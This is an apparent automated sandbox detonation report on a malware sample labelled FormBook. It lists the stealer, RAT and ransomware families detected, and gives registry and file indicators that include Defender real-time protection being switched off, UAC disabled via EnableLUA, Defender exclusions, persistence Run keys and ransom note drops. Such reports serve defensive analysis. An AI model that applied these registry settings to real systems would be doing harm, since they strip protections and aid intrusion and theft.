Analysis Overview
SHA256
69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Threat Level: Known bad
The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.
Malicious Activity Summary
TargetCompany,Mallox
Lumma Stealer
Amadey
RisePro
RedLine
AsyncRat
PrivateLoader
Detect Xworm Payload
Modifies firewall policy service
Xworm
RedLine payload
UAC bypass
Windows security bypass
Modifies Windows Defender Real-time Protection settings
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Renames multiple (3581) files with added filename extension
Modifies boot configuration data using bcdedit
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Reads user/profile data of local email clients
Identifies Wine through registry keys
Drops startup file
.NET Reactor proctector
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Checks BIOS information in registry
Windows security modification
Looks up external IP address via web service
Writes to the Master Boot Record (MBR)
Enumerates connected drives
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Unsigned PE
Enumerates physical storage devices
outlook_win_path
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Runs ping.exe
Suspicious behavior: RenamesItself
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
System policy modification
Kills process with taskkill
GoLang User-Agent
outlook_office_path
Modifies system certificate store
Modifies registry class
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-01 15:54
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 15:54
Reported
2024-06-01 16:41
Platform
win10v2004-20240508-en
Max time kernel
226s
Max time network
404s
Command Line
Signatures
Amadey
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Lumma Stealer
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
TargetCompany,Mallox
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\New.exe = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
Xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (3581) files with added filename extension
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\mixinte.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\winlogon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\ADServices.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Egt2KEDlnEDPcHbFceEZsAgS.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster2663.lnk | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bAyFUgihOmry7UanLMPlSg0f.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UnWnb8fpIRuRuUDL2hrh8crR.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2663.lnk | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qBZ6zP2KgZdQaOhCd7LCnPnD.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jRT49afIpKbuIh72Jl4Dld3H.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J6M0PD9v12iBlUQzTRVA27yZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine | C:\Users\Admin\Desktop\a\random.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\New.exe = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP2663 = "C:\\Users\\Admin\\AppData\\Local\\RageMP2663\\RageMP2663.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..." | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest2663 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest2663\\MaxLoonaFest2663.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\\AdobeUpdaterV2663.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\U: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\E: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\R: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\B: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\I: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\X: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\N: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\P: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\S: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\L: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\A: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\K: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\T: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\H: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\V: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\W: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\E: | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened (read-only) | \??\J: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\M: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\O: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\a\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-125_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Cambria.xml | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\23.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Videos\SmartSelect\Magic_Select_crop_handles.mp4 | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\AppxSignature.p7x | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.proofing.msi.16.en-us.xml | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN027.XML | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\he-il\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-64_altform-unplated.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
